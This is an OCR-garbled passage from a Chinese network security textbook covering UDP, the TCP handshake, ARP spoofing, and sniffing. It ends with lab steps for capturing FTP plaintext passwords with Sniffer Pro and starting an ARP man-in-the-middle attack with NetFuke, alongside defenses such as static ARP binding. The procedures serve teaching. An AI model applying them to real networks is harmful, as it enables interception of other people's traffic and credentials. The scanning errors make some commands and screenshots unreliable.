检验 UDP 报 文 是 否 正确 传送 到 了 目的 地 。 

UDP 协议 建立 在 IP 协议 之 上 , 同 IP 协议 一 样 提 供 无 连接 数据 包 传输 。 相 对 于 IP 协 
议 , 它 唯一 增加 的 功能 是 提供 协议 端口 ,以 保证 进程 的 通信 。 

许多 基于 UDP 的 应 用 程序 在 高 可 靠 性 、 低 延迟 的 局 域 网 上 运行 很 好 ,而 一 旦 到 了 通信 
子 网 QoS( 服 务 质量 ) 很 低 的 互联 网 中 ,可 能 根本 不 能 运行 ,原因 就 在 于 UDP 不 可 靠 ,而 这 
些 程序 本 身 又 没有 做 可 靠 性 处 理 。 因 此 ,基于 UDP 的 应 用 程序 在 不 可 靠 子 网 上 必须 自己 
解决 可 靠 性 (诸如 报 文 丢失 ,重复 . 失 序 和 流量 控制 等 ) 问 题 。 

既然 UDP 如 此 不 可 靠 ,为 何 TCP/IP 还 要 采纳 它 ? 最 主要 的 原因 在 于 UDP 的 高 效 
率 。 在 实际 应 用 中 ,UDP 往往 面向 只 需 少 量 报 文 交互 的 应 用 ,假如 为 此 而 建立 连接 和 撤销 
连接 ,开销 是 相当 大 的 。 在 这 种 情况 下 ,使 用 UDP 就 很 有 效 了 ,即使 因 报 文 损失 而 重 传 一 
次 ,其 开销 也 比 面向 连接 的 传输 要 小 。 


3.3.5 三 次 握手 机 制 


三 次 握手 机 制 首先 要 求 对 本 次 TCP 连接 的 所 有 报 文 进行 编号 , 取 一 个 随机 值 作为 初始 
序号 。 由 于 序号 域 足够 长 ,可 以 保证 序号 循环 一 周 时 使 用 同一 序号 的 旧 报 文 早 已 传输 完毕 ， 
网 络 上 也 就 不 会 出 现 关 于 同一 连接 、 同 一 序号 的 两 个 不 同 报 文 。 在 三 次 握手 机 制 的 第 一 次 
中 ,A 机 向 BB 机 发 出 连接 请 求 (CR), 其 中 包含 A 机 端的 初始 报 文 序号 (比如 X); 第 二 次 ， 
B 机 收 到 CR 后 ,发 回 连 接 确认 (CC) 消 息 ,其 中 ,包含 B 机 端的 初始 报 文 序号 (比如 YY) ,以 
及 B 机 对 A 机 初始 序号 X 的 确认 (确认 号 为 X 十 1, 即 期 望 收 到 对 方 的 下 一 个 数据 的 序号 ); 
第 三 次 ,A 机 向 B 机 发 送 序 号 为 X 十 1 的 数据 ,其 中 包含 对 也 机 初始 序号 Y 的 确认 (确认 号 
为 Y 十 1)。 三 次 握手 过 程 如 图 3-10 所 示 。 
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A( 客 户 端 ) B( 服 务 端 ) 
连接 请 求 
(初始 序号 =X) 
连接 请 求 
(初始 序号 =X) 
连接 确认 


(初始 序号 =Y， 确 认 号 =X+1) 


连接 确认 
(初始 序号 =Y， 确认 号 =X+1) 


数据 

(序号 =X+1， 确 认 号 =Y+1) 
数据 

(序号 -X+1， 确 认 号 =Y+1) 





图 3-10 TCP 的 三 次 握手 过 程 


3.3.6 ARP 欺骗 攻击 


1. ARP 欺骗 攻击 的 原理 

假设 主机 A 曾经 和 主机 B 进行 过 通信 ,主机 A 就 会 在 ARP 缓存 表 中 记录 下 主机 也 的 
IP 地 址 和 其 对 应 的 MAC 地 址 。 一 般 的 ,ARP 缓存 表 都 有 更 新 机 制 . 当 有 主机 通知 其 他 主 
机 其 MAC 地 址 更 新 时 ,会 向 其 他 主机 发 送 ARP 更 新 信息 ,以 便 这 些 主机 及 时 更 新 其 ARP 
缓存 表 。 每 台 主机 在 收 到 ARP 数据 包 时 都 会 更 新 自己 的 ARP 缓存 表 。ARP 欺骗 攻击 的 
原理 ,就 是 通过 发 送 欺 骗 性 的 ARP 数据 包 ,致使 接收 者 收 到 欺骗 性 的 ARP 数据 包 后 ,更 新 
其 ARP 缓存 表 , 从 而 建立 错误 的 IP 地 址 与 MAC 地 址 的 对 应 关系 。 

ARP 欺骗 主要 分 为 两 种 : 一 种 是 伪装 成 主机 的 ARP 欺骗 ; 另 一 种 是 伪装 成 网 关 的 
欺骗 。 

伪装 成 主机 的 ARP 坎 骗 主要 是 在 局 域 网 环境 内 实现 的 。 假 设 在 同一 个 局 域 网 中 有 和 A、 
B.C 三 台 主 机 ,它们 的 IP 地 址 与 MAC 地 址 分 别 如 下 : A 的 为 192. 168. 1. 1 和 AA-AA- 
AA-AA-AA-AA;B 的 为 192. 168. 1. 2 和 BB-BB-BB-BB-BB-BB;C 的 为 192. 168. 1. 3 和 
CC-CC-CC-CC-CC-CC。A 想 要 与 B 进行 直接 通信 ,而 C 想 要 窃取 A 所 发 给 B 的 内 容 。 这 
时 ,C 可 以 向 A 发送 欺骗 性 的 ARP 数据 包 , 声 称 B 的 MAC 地 址 已 经 变 为 CC-CC-CC-CC- 
CC-CC。 这 样 在 A 的 ARP 缓存 表 中 将 建立 IP 地 址 192. 168. 1. 2 和 MAC 地 址 CC-CC-CC- 
CC-CC-CC 的 对 应 关系 。 于 是 A 发 给 也 的 所 有 内 容 将 被 交换 机 按照 CC-CC-CC-CC-CC-CC 
的 MAC 地 址 发 送 至 C 的 网 卡 。C 在 收 到 并 阅读 了 A 发 给 B 的 内 容 之 后 ,为 了 不 被 通信 双 
方 (A 和 B) 发 现 ,可 以 将 数据 内 容 再 转发 给 B。 此 时 C 需要 将 发 送 给 也 的 数据 包 的 源 IP 地 
址 和 源 MAC 地 址 改 为 A 的 ,从 而 不 引起 B 的 怀疑 。 

当然 ,C 也 可 以 使 用 相同 的 手段 对 B 进行 ARP 欺骗 ,让 B 认为 C 就 是 A。 这 样 ,A、 
B 之 间 的 所 有 数据 都 经 过 了 “中 间 人 ”C。 对 于 A、B 而 言 , 已 很 难 发 现 C 的 存在 。 这 就 是 利 
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用 ARP 欺骗 实现 的 中 间 人 攻击 ,如 图 3-11 所 示 。 
局 一 一 一 一品 
A 下 A 和 B 的 通信 内 容 一 C 一 A 和 B 的 通信 内 容 六 B 


图 3-11 ARP 欺骗 实现 中 间 人 攻击 








如 果 C 发 给 A 的 ARP 欺骗 数据 包 中 ,所 包含 的 MAC 地 址 是 伪造 并 且 不 存在 的 , 则 
A 机 器 更 新 后 的 ARP 缓存 表 中 ,B 的 IP 地 址 对 应 的 MAC 地 址 就 是 一 个 不 存在 的 MAC 地 
址 ,那么 A 将 和 了 BB 通 信 时 所 构造 的 数据 帧 中 ,目的 MAC 地 址 就 是 一 个 不 存在 的 MAC 地 
址 ,A、B 之 间 的 通信 也 就 无 法 进行 了 ,这 也 就 是 ARP 病毒 或 ARP 攻击 能 够 使 网 络 通 信 竣 
痪 和 中 断 的 原因 。 

ARP 病毒 主机 或 ARP 攻击 主机 伪装 成 网 关 的 欺骗 行为 ,主要 是 针对 局 域 网 内 部 与 外 
界 通信 的 情况 。 当 局 域 网 内 的 主机 要 与 外 网 的 主机 通信 时 ,需要 先 将 数据 包 发 送 至 网 关 , 再 
传输 至 外 网 。 当 主机 A 想 要 与 外 网 的 主机 通信 , 它 向 外 传输 的 数据 包 进 行 封装 时 ,就 要 将 
数据 帧 中 的 目的 MAC 地 址 写成 网 关 的 MAC 地 址 ,这 样 数据 包 就 先 交 给 网 关 , 再 由 网 关 转 
发 到 外 网 。 如 果 局 域 网 内 的 主机 C 中 了 ARP 病毒 ,C 想 截获 A 发 出 的 消息 内 容 ,C 就 需要 
向 A 发 送 欺 骗 性 的 ARP 包 , 声 称 网 关 的 MAC 地 址 改 成 了 C 的 MAC 地 址 了 ,这 样 A 再 给 
网 关 发 送 数 据 包 时 ,数据 包 就 转 给 了 病毒 主机 C, 病 毒 主机 C 获得 了 A 的 通信 内 容 后 ,可 以 
再 将 数据 包 转 给 真正 的 网 关 , 最 终 也 能 实现 A 和 外 网 的 数据 传输 ,但 通信 内 容 被 C 获取 了 。 
如 果 病 毒 主机 C 不 将 数据 包 转 发 给 真正 的 网 关 , 则 A 就 不 能 与 外 界 通信 了 。 

2. ARP 欺骗 攻击 的 防范 

上 面 提 到 了 ARP 欺骗 对 通信 的 安全 造成 的 危害 ,不 仅 如 此 , 它 还 可 以 造成 局 域 网 的 内 
部 混乱 ,让 一 些 主机 之 间 无 法 正常 通信 ,让 被 欺骗 的 主机 无 法 访问 外 网 。 一 些 黑客 工具 不 仅 
能 够 发 送 ARP 欺骗 数据 包 , 还 能 够 通过 发 送 ARP 恢复 数据 包 来 实现 对 网 内 计算 机 是 否 能 
上 网 的 随意 控制 。 

更 具 威 胁 性 的 是 ARP 病毒 ,现在 的 ARP 欺骗 病毒 可 以 使 局 域 网 内 出 现 经 常 性 掉 线 、 
IP 冲突 等 问题 ,还 会 伪造 成 网 关 使 数据 先 流 经 病毒 主机 ,实现 了 对 局 域 网 数据 包 的 嗅 探 和 
过 滤 分 析 , 并 在 过 滤 出 的 网 页 请 求 数据 包 中 插入 恶意 代码 。 如 果 收 到 该 恶意 代码 的 主机 存 
在 着 相应 的 漏洞 ,那么 该 主机 就 会 运行 恶意 代码 中 所 包含 的 恶意 程序 ,实现 主机 被 控 和 信息 
泄密 。 

可 以 通过 IDS 或 者 Antiarp 等 查找 ARP 欺骗 的 工具 检测 网 络 内 的 ARP 欺骗 攻击 , 然 
后 定位 ARP 病毒 主机 ,清除 ARP 病毒 来 彻底 解决 网 络 内 的 ARP 欺骗 行为 。 此 外 ,还 可 以 
通过 MAC 地 址 与 IP 地 址 的 双向 绑 定 ,使 ARP 欺骗 不 再 发 挥 作用 。MAC 地 址 与 IP 地 址 
的 双向 绑 定 ,是 在 内 网 的 主机 中 ,将 网 关 的 IP 地 址 和 真正 的 MAC 地 址 做 静态 绑 定 ; 同 时 在 
网 关 或 者 路 由 设备 中 ,将 内 网 主机 的 IP 地 址 和 真正 的 MAC 地 址 也 做 静态 绑 定 ,这 就 可 以 
实现 网 关 和 内 网 的 主机 不 再 受 ARP 欺骗 的 影响 了 。 

MAC 地 址 与 IP 地 址 双向 绑 定 方法 防止 ARP 欺骗 的 配置 过 程 如 下 。 

首先 ,在 内 网 的 主机 上 ,把 网 关 的 IP 地 址 和 MAC 地 址 做 一 次 绑 定 ,在 Windows 中 绑 
定 过 程 可 使 用 arp 命令 : 
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arp -ad * 
arp -s 网 关 IP 网 关 Mac 
“arp -d * ”命令 用 于 清空 arp 缓存 表 ,“arp -s 网 关 IP 网 关 MAC” 命 令 则 是 将 网 关 IP 
地 址 与 其 相应 的 MAC 地 址 进行 静态 绑 定 。 
其 次 ,在 路 由 器 或 者 网 关上 将 内 网 主机 的 IP 地 址 和 MAC 地 址 也 绑 定 一 次 。 


3.3.7 网 络 监 听 


通常 ,一 个 网 络 接口 只 接收 以 下 两 种 数据 帧 。 

(1) 帧 的 目的 MAC 地 址 与 自己 硬件 地 址 (MAC 地 址 ) 相 匹配 的 数据 帧 。 

(2) 发 向 所 有 机 器 的 广播 数据 帧 。 

网 卡 负责 数据 的 收发 , 它 接收 传输 来 的 数据 帧 ,然后 网 卡 内 的 程序 查看 数据 帧 的 目的 
MAC 地 址 ,再 根据 网 卡 驱动 程序 设置 的 接收 模式 判断 该 不 该 接收 。 如 果 接 收 , 则 接收 后 应 
通知 CPU 进行 处 理 , 否 则 就 会 丢弃 该 数据 帧 ,丢弃 的 数据 帧 会 直接 被 网 卡 阻截 ,计算 机 根 
本 不 知道 。 

网 卡通 常 有 以 下 4 种 接收 方式 。 

(1) 广播 方式 : 接收 网 络 中 的 广播 信息 。 

(2) 组 播 方式 : 接收 组 播 数据 。 

(3) 直接 方式 : 只 接收 帧 的 目的 MAC 地 址 与 自己 的 MAC 地 址 相 匹 配 的 数据 帧 。 

(4) 混杂 方式 : 接收 一 切 通过 它 的 数据 ,而 不 管 该 数据 是 否 是 传 给 它 的 。 

图 3-12 为 一 个 简单 的 网 络 监听 模式 的 拓扑 图 ,机 器 A、B.、C 与 集线器 HUB 连接 , 集 线 
器 HUB 通过 路 由 器 访问 外 部 网 络 。 


192.168.1.254 
集线器 HUB 










Sniffer Pro 





机 器 A 机 器 B 机 器 C 
192.168.1.11 192.168.1.12 192.168.1.13 


图 3-12 一 个 简单 的 网 络 监听 模式 的 拓扑 图 


管理 员 在 机 器 A 上 使 用 FTP 命令 向 机 器 B 进行 远程 登录 ,首先 机 器 A 上 的 管理 员 输 
入 登录 机 器 B 的 FTP 用 户 名 和 密码 ,经 过 应 用 层 FTP 协议 ,传输 层 TCP 协议 .网 络 层 IP 
协议 ,数据 链 路 层 协议 一 层 层 地 包 里 ,最 后 送 到 物理 层 。 接 下 来 数据 帧 传输 到 集线器 HUB 
上 ,然后 由 HUB 向 每 一 个 节点 广播 此 数据 帧 ,机 器 B 接收 到 由 HUB 广播 发 出 的 数据 帧 ， 
并 检查 数据 帧 中 的 目的 MAC 地 址 是 否 和 自己 的 MAC 地 址 匹配 ,如 果 匹 配 则 对 数据 帧 进 
行 分 析 处 理 , 而 机 器 C 同时 也 收 到 了 该 数据 帧 , 则 先 将 目的 MAC 地 址 和 自己 的 MAC 地 址 
进行 匹配 比较 ,如 果 不 匹配 则 丢弃 该 数据 帧 。 
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如 果 机 器 C 的 网 卡 接收 模式 为 混杂 方式 , 则 它 将 所 有 接收 到 的 数据 帧 (不 论 目的 MAC 
地 址 是 否 与 自己 的 MAC 地 址 相 匹配 都 交 给 上 层 协议 软件 处 理 , 这 样机 器 C 就 变 成 了 此 网 
络 中 的 监听 者 ,可 以 监听 机 器 A 和 机 器 B 的 通信 。 

早期 的 HUB 是 共享 介质 的 工作 方式 ,只 要 把 主机 网 卡 设置 成 混杂 方式 ,网 络 监听 就 可 
以 在 任何 接口 上 实现 。 现 在 的 网 络 基本 上 都 用 交换 机 ,交换 机 的 工作 原理 与 HUB 不 同 , 普 
通 的 交换 机 工作 在 数据 链 路 层 ,交换 机 的 内 部 有 一 个 端口 和 MAC 地 址 的 映射 表 , 当 有 数据 
进入 交换 机 时 ,交换 机 首先 查看 数据 帧 中 的 目的 MAC 地 址 ,然后 按照 映射 表 转 发 到 相应 的 
端口 ,其 他 端口 收 不 到 数据 。 只 有 目的 MAC 地 址 是 广播 地 址 的 , 才 转 发 给 所 有 的 端口 。 因 
此 ,交换 环境 下 的 网 络 比 用 HUB 连接 的 网 络 安全 得 多 。 

现在 许多 交换 机 都 支持 端口 镜像 功能 ,能 够 把 进入 交换 机 的 所 有 数据 都 映射 到 监控 端 
口 , 同 样 可 以 监听 所 有 的 数据 包 , 从 而 进行 数据 分 析 。 要 实现 这 个 功能 ,必须 能 对 交换 机 进 
行 端口 镜像 设置 才 可 以 。 

网 络 监听 常常 要 保存 大 量 的 信息 ,并 对 其 进行 大 量 的 整理 ,这 会 大 大 降低 处 于 监听 的 主 
机 对 其 他 主机 的 响应 速度 ,同时 监听 程序 在 运行 的 时 候 需 要 消耗 大 量 的 处 理 器 时 间 ,如 果 在 
此 时 分 析 数 据 包 ,许多 数据 包 就 会 因为 来 不 及 接收 而 被 遗漏 ,所 以 监听 程序 一 般 会 将 监听 到 
的 数据 包 先 存放 在 文件 中 , 留 作 以 后 分 析 使 用 。 


34 项 目 实施 


3.4.1 任务 1: Sniffer Pro 软件 的 安装 与 使 用 


1. 任务 目标 

(1) 掌握 Sniffer 软件 的 安装 与 抓 包 使 用 方法 。 

(2) 了 解 三 次 握手 过 程 。 

(3) 了 解 FTP 明文 传输 过 程 。 

2. 任务 内 容 

(1) Sniffer Pro 软件 的 安装 。 

(2) 捕获 FTP 明文 密码 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7/2008 操作 系统 的 计算 机 3 台 , 其 中 一 台 已 安装 FTP 服务 。 

(2) 集线器 (HUB)1 台 , 作 为 网 络 连接 设备 。 直 通 线 若 干 根 。 

(3) Sniffer Pro 4.7.5 软件 1 套 。 

4. 任务 实施 步骤 

Sniffer Pro 软件 可 运行 在 局 域 网 的 任何 一 台 计算 机 上 .练习 使 用 时 ,网 络 最 好 用 集线器 
(HUB) 连 接 且 所 有 计算 机 在 同一 个 子 网 中 ,这 样 能 抓 到 连接 到 HUB 上 的 每 台 计 算 机 所 传 
输 的 数据 包 。 

1) Sniffer Pro 软件 的 安装 

步骤 1: 从 网 上 下 载 Sniffer Pro 软件 安装 包 , 本 项 目 以 安装 Sniffer Pro 4.7.5 版 本 为 例 
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进行 介绍 。 
步骤 2: 在 主机 C 中 ,双击 安装 包 文件 开始 安装 ,进入 如 图 3-13 所 示 的 安装 程序 界面 。 





Welcome to the InstallShield Wizard 
for Sniffer Portable 4.7.5 


The InstaliShield Wizard(TM) wil help install Sniffer Portable 
4.7.5 on your computer. To continue, di Next. 





图 3-13 ”安装 程序 界面 
步骤 3: 





击 Next 按钮 ,打开 Software License Agreement 对 话 框 , 如 图 3-14 所 示 。 





Please read the folowing License Agreement. Press the PAGE DOWN key to see 
the rest of the agreement 





Network Associates Two [2jYear End User License Agreement 四 






NOTICE TO ALL USERS: CAREFULLY READ THE FOLLOWING LEGAL 


IDO NOT INSTALL THE SOFTWARE. (IF APPLICABLE. YOU MAY RETURN THE 
IPRODUCT TO THE PLACE OF PURCHASE FOR A FULL REFUND.) 


Do you accept al the terms of he preceding License Agreement? Ifyou choose No, Setup 
wil close. To install Sniffer Pro, you must accept this agreement 


cock w 


图 3-14 ”Software License Agreement 对 话 框 








步骤 4: 单 击 Yes 按钮 ,打开 User Information 对 话 框 ,如 图 3-15 所 示 。 

步骤 5: 输入 用 户 名 (admin) 和 所 在 单位 名 称 (education) 后 , 单 击 Next 按钮 ,打开 
Choose Destination Location 对 话 框 ,如 图 3-16 所 示 , 软 件 默 认 安 装 在 C:\Program Files\ 
NAISnifferNT 文件 夹 中 。 如 果 要 更 改 安装 目录 ,可 单 击 Browse 按钮 进行 更 改 , 这 里 采用 
默认 安装 。 

步骤 6: 单 击 Next 按钮 ,等 待 程序 安装 ,然后 会 出 现 如 图 3-17 所 示 的 Sniffer Pro User 
Registration 对 话 框 , 在 该 对 话 框 的 各 文本 框 中 输入 用 户 注册 信息 。 


87 


网 络 安全 技术 项 目 化 教程 第 2 版 ) 





88 











Please enter your name and the name of the company for whom 
you work 





图 3-15 ”User Information 对 话 框 


Setup wil install Sniffer Pro in the following folder 

To install to this folder, cick Next 

To install to a different folder, click Browse and select another 
folder. 


You can choose not to install Sriffer Pro by cicking Cancel to 
exit Setup. 





| CAProgam Fies\NAI\SniferNT _Browe. | 











< Back Next > Cancel 





Enter your nane and infornation * ~ Indicates a 


# First Nane: [adnin 
二 Last Nane: [oa 
* Business [a 


* Customer Education 了 
本 E-mail [1258aa com 








上 一 步 中 ) | 下 一 步 oD >| 取消 
图 3-17 用 户 注册 信息 





项 目 3 网 络 协议 与 分 析 
步骤 7: 填写 完 相 关内 容 后 , 单 击 “ 下 一 步 "按钮 ,软件 会 提示 输入 产品 序列 号 ,如 图 3-18 
所 示 。 正 确 输入 序列 号 ,根据 安装 向 导 提 示 单 击 “ 下 一 步 ”按钮 ,直至 完成 。 





# Please let us Jaow where you [TY wivertisenent =] 
er TV savertisenent 


Do you wish to receive EE 可 
announcenents about this 

produet? 

May we share your name with ye 5 
other companies that use NAT 

produets? 


Sniffer seriu Hunber | 














< 上- 步 不- 步 中 站 。 取消 
图 3-18 输入 产品 序列 号 


步骤 8: 重新 启动 计算 机 , 因 Sniffer Pro 软件 是 英文 版 的 ,为 了 便于 使 用 ,可 从 网 上 下 
载 并 安装 相应 的 汉化 包 软 件 , 最 终 完 成 Sniffer Pro 软件 的 安装 。 

2) 捕获 FTP 明文 密码 

以 下 操作 中 ,主机 A(192. 168. 10. 11) 作 为 FTP 用户, 主机 B(192. 168. 10. 12) 作为 
FTP 服务 器 ,主机 C(192. 168. 10. 13) 作 为 网 络 监听 主机 。 

步骤 1: 在 主机 C 中 ,选择 开始 习 所 有 程序 一 Sniffer Pro>Sniffer 命令 ,进入 Sniffer 程 
序 主 界面 ,如 图 3-19 所 示 ( 已 安装 汉化 包 软 件 ) 。 


捕获 停止 | | 捕获 条 件 
| [4 
EG 


























图 3-19 ”Sniffer 程序 主 界面 
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进行 流量 捕获 之 前 首先 要 选择 正确 的 网 络 接口 ,选择 正确 的 网 络 接口 后 才能 正常 工作 。 
步骤 2: 选择 “文件 ”>“ 选 定 设置 "命令 ,打开 “当前 设置 ”对 话 框 ,如 图 3-20 所 示 ,选择 

正确 的 网 络 接口 后 , 单 击 “ 确 定 ” 按 钮 ,返回 go 

Sniffer 程序 主 界面 。 如 果 主 机 具有 多 个 网 络 

接口 , 且 需 要 监听 的 网 络 接口 不 在 列表 中 ,可 以 





单 击 “新 建 "按钮 添加 。 Hirer ee 
步骤 3: 新 建 一 个 过 滤器 。 选 择 “ 捕 获 ” 一 WD) 


厂 Leg oftf 


“定义 过 滤器 ”命令 ,打开 “定义 过 滤器 -捕获 ”对 
话 框 , 单 击 * 配 置 文件 ”按钮 ,打开 * 捕 获 配 置 文 
件 ” 对 话 框 , 单 击 “ 新 建 " 按 钮 ,打开 “新 建 捕获 配 
置 文件 ”对 话 框 ,在 “新 配置 文件 名 ”文本 框 中 输 
入 ftp, 如 图 3-21 所 示 。 

步骤 4: 单 击 “ 好 ”按钮 ,返回 “捕获 配置 文 
件 ” 对 话 框 ,再 单 击 “ 完 成 ”按钮 ,返回 “定义 过 滤器 -捕获 ”对 话 框 ,在 “高 级 "选项 卡 中 ,展开 
IP>TCP 选项 ,并 选中 FTP 复 选 框 ,如 图 3-22 所 示 , 单 击 “ 确 定 ” 按 钮 。 然 后 单 击 工具 栏 中 
的 捕获 “开始 ”按钮 >》 ,开始 捕获 数据 包 。 





图 3-20 “当前 设置 "对 话 框 





人 复制 已 存在 的 : 了 ) 
默认 器 
个 从 样本 复制 : E) 


[sis Talk = 























3-21 “新 建 捕 获 配置 文件 ”对 话 框 


摘要 | 地 址 | 数据 模式 高 级 | 组 中 | 为 设置 























数据 和 大 小 6) 攻 扫 和 类 型 中) 

三 这 

所 有 的 大 小 es - 
一 | 加 文件 





图 3-22 “定义 过 滤器 -捕获 ”对 话 框 
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步骤 5: 在 主机 A 中 ,利用 DOS 命令 方式 登录 主机 B 的 FTP 服务 器 。 在 DOS 命令 提 
示 符 窗口 中 ,输入 “ftp 192. 168. 10. 12” 命 令 , 然 后 输入 FTP 用 户 名 (如 abc) 及 密码 (如 
123456) ,进入 FTP 服务 器 ,如 图 3-23 所 示 。 此 时 ,Sniffer 正在 对 此 次 活动 进行 记录 和 
捕 包 。 





t Windows [hi 本 6.1.7681] 
《c》 2889 HM soft Corporation 


UD ETRETED 


| 192.168.19.12 


word required for abc- 


logged in. 








图 3-23 用 DOS 方式 登录 主机 B 的 FTP 服务 器 


步骤 6: 在 主机 C 中 ,从 捕获 界面 中 看 到 捕获 数据 包 已 达到 一 定数 量 ,此 时 可 单 击 工具 





栏 中 的 捕获 “停止 和 显示 ”按钮 几 ,停止 捕获 。 单 击 窗口 左下 角 的 “解码 "选项 卡 ,窗口 中 会 
显示 捕获 到 的 数据 包 , 并 分 析 捕 获 的 数据 包 , 如 图 3-24 所 示 。 

写 Sniffer Fortable - Local 《 坎 件 由 高 显 革 修改 没 化 ) -大 网 此 潭 度 在 1000 Mbps) - [Snifl 名 到 1/11 EECE3 

是 文件 Fj 监视 器 (M) 和 补 赤 IC 时 示 (DI 工具 [数据 车 (B| 恒 吕 W)。 胡 2h(H) = sx 





UE ES Tr | 
2 党 |@| 要 | 六 | 加 | 色 | 多 | 多 | @| 


























-0-12 TC DT 5-15160 SH SH-2051707165 LET 
10.11] Tee D49150 














讨 
2]| T 





d required for abc 
4 WINSBL33 
















3 enged in 
CK~E2020455 VIN-8112 6 











td 


n the Hex Dump 





i000 00 ce 27 th dg 35 00 DC 23 04 5 
0000010: 00 34 00 79 4) DO B0 VE 00 00 c0 =8 0a Db ce: 
Ni 人 0 De ic ehodnniins ee 
9720 Balassionlon 六 4 68 bol 03 03 30 Ol 01 
pooo0040: loa 

















图 3-24 数据 包 解 码 





从 图 3-24 中 可 看 到 通信 双方 的 IP 地 址 和 开启 的 端口 号 等 信息 ,数据 包 1、2、3 是 主机 
A 和 主机 B 的 TCP 的 “三 次 握手 ”。 数 据 包 1 显示 主机 A 向 服务 器 B 发 出 了 FTP 连接 请 
求 ,数据 中 包含 了 SYN( 建 立 联机 ) ,数据 包 2 是 服务 器 也 向 主机 A 发 送 的 应 答 ,数据 中 包含 
了 SYN 和 ACK( 确 认 ) ,此 时 ,TCP 已 经 完成 了 两 次 握手 。 数 据 包 3 显示 了 第 三 次 握手 , 数 
据 中 包含 了 ACK ,从 而 完成 了 TCP 连接 。 
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数据 包 6 是 主机 A 向 服务 器 B 发 送 的 账号 数据 ,其 中 的 USER abc 代表 此 用 户 名 为 
abc。 数 据 包 9 是 主机 A 向 服务 器 B 发 送 的 密码 数据 ,其 中 的 PASS 123456 代表 该 用 户 的 
密码 为 123456。 这 正 说 明了 FTP 中 的 数据 是 以 明文 形式 传输 的 ,在 捕获 的 数据 包 中 可 以 
分 析 到 被 监听 主机 的 任何 行为 。 


3.4.2 任务 2: ARP 欺骗 攻击 与 防范 


1. 任务 目标 

(1) 理解 ARP 欺骗 攻击 的 原理 。 

(2) 掌握 Sniffer 软件 的 使 用 方法 。 

(3) 了 解 ARP 欺骗 攻击 的 防范 方法 。 

2. 任务 内 容 

(1) 配置 TCP/IP 协议 和 查询 MAC 地 址 。 

(2) ARP 单 向 欺骗 。 

(3) ARP 双向 欺骗 。 

(4) ARP 欺骗 攻击 的 防范 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 操作 系统 的 计算 机 1 台 ,作为 主机 A( 攻 击 机 ) ,攻击 主机 BB 与 网 
关 之 间 的 通信 。 

(2) 安装 有 Windows 7/2008 操作 系统 的 计算 机 1 台 , 作 为 主机 B, 通 过 网 关上 网 。 

(3) 路 由 器 一 台 , 作 为 访问 外 网 的 网 关 (192. 168. 10. 2) 。 

(4) ARP 欺骗 攻击 软件 NetFuke 和 抓 包 工具 软件 Sniffer Pro 各 1 套 。 

4. 任务 实施 步骤 

1) 配置 TCP/IP 协议 和 查询 MAC 地 址 

步骤 1: 配置 主机 A 和 主机 也 的 IP 地 址 分 别 为 192. 168. 10. 11 和 192.168.10.12, 子 网 抢 
码 均 为 255. 255. 255. 0, 默 认 网 关 均 为 192. 168. 10. 2 ,首选 DNS 服务 器 均 为 192. 168. 10. 2 。 

步骤 2: 在 主机 B 上 访问 www. baidu. com 网 址 ,确保 能 正常 上 网 。 

步骤 3: 在 主机 A 上 执行 ipconfig /all 命令 ,查询 主机 A(192. 168. 10. 11) 的 MAC 地 
址 为 00-0C-29-04-61-3E, 如 图 3-25 所 示 。 

步骤 4: 在 主机 B 上 执行 ipconfig /all 命令 ,查询 主机 B(192. 168. 10. 12) 的 MAC 地 址 
为 00-0C-29-FB-D4-35 ,如 图 3-26 所 示 。 

步骤 5: 在 主机 B 上 执行 arp -a 命令 ,查询 网 关 (192. 168. 10. 2) 的 MAC 地 址 为 00-50- 
56-fc-c5-a0 ,如 图 3-27 所 示 。 

2) ARP 单 向 欺骗 

ARP 单 向 欺骗 指 的 是 通信 过 程 *S( 来 源 IP) 一 M( 中 间 人 IP) 一 D( 目 标 IP)”, 即 实际 通 
信 中 M 伪装 成 了 DD,S 被 M 欺骗 .将 本 应 发 送 给 D 的 信息 发 送 给 了 M。 那 么 ,在 开始 欺骗 
的 时 候 ,M 就 要 发 送 ARP 欺骗 数据 包 给 S, 欺 骗 S 并 使 其 认为 M 就 是 D。 如 果 M 的 MAC 
地 址 是 伪造 的 ,实际 并 不 存在 ,那么 S 的 数据 包 就 不 可 能 到 达 D。 
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加 答 理 员 : C\Windows\system32\cmd.exe 
TCD | 


和 inaovs IP 配置 


主机 名 了 PC-28121118B199 


TIntelKR》 PRO/1888 MT Netvork Connection 


用 
羞 已 启用 


IPv6 地 址 689: :ole5:de9b:f3f6:cc44x11( 首 选 ) 


55-255-255- 
192.168.18.2 

234884137 
: 99-91-99-91-18-39-7D-h2-99-9C-29-94-61-3H| 


192.168.18.2 
用 








|c: sor 


Windows IP i 


localdonain 
TntelcR)》 PRO/1989 MT Network co 


DHCP 





查询 主机 B 的 MAC 地 址 


管理 员 : C: Mindors\systen32\cnd exe 
C: Wsers\Adninistrator 


]: 192.168.18.12 Bxb 
Internet 中 
192.168.19.1 88-59-56-cg-99-98 





00-50-56-F4-4e-50 
上 和 一 人 人 一 人 一 上 下 上 一 人 
B1-B9-5e-98-99-16 
91-80-5e-80-80-fc 
Ef—FE EEE -FEFE 


Users\Adninistrator>, 








图 3-27 查询 网 关 的 MAC 地 址 
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本 例 中 ,主机 B(192. 168. 10. 12) 作 为 ,攻击 主机 A(192. 168. 10. 11) 作 为 M, 网 关 
(192. 168. 10. 2) 作 为 D。 

步骤 1: 在 攻击 主机 A(192. 168. 10. 11) 上 安装 ARP 欺骗 工具 软件 NetFuke 和 抓 包工 
具 软 件 Sniffer Pro 。 

步骤 2: 打开 NetFuke 工具 软件 ,如 图 3-28 所 示 。 








NetFuke Ver1.0.7 Build[Mar 13 2010] Es 
Fuke(R 设置 (5) 插件 (0) 报 作 (CO 查看 (V) 视图 ”帮助 (H) 
>eme| 人 D+|j- 旧 VY* r 回国 | 仿 




















状态 ; Waitting | 用 时 : 00h00m00s | 包 数 : 00000000 P/000000000 Bytes [如 率 : S/A 00000/00000 p/s | 流量 : S 


图 3-28 NetFuke 的 界面 


步骤 3: 选择 “设置 ”>“ 嗅 探 设 置 " 命 令 , 打 开 “ 嗅 探 设置 "对 话 框 ,在 “网 卡 选择 ”下拉 列 
表 框 ee 泽 在 实验 网 络 环境 中 的 网 卡 ,选中 “启用 ARP 欺骗 "和 “启用 混杂 模式 监 











听 ” 复 选 “主动 转发 " 单 选 按钮 ,如 图 3-29 所 示 , 单 击 “ 确 定 ” 按 钮 。 
遥控 设 置 区 中 
网 卡 配 置 


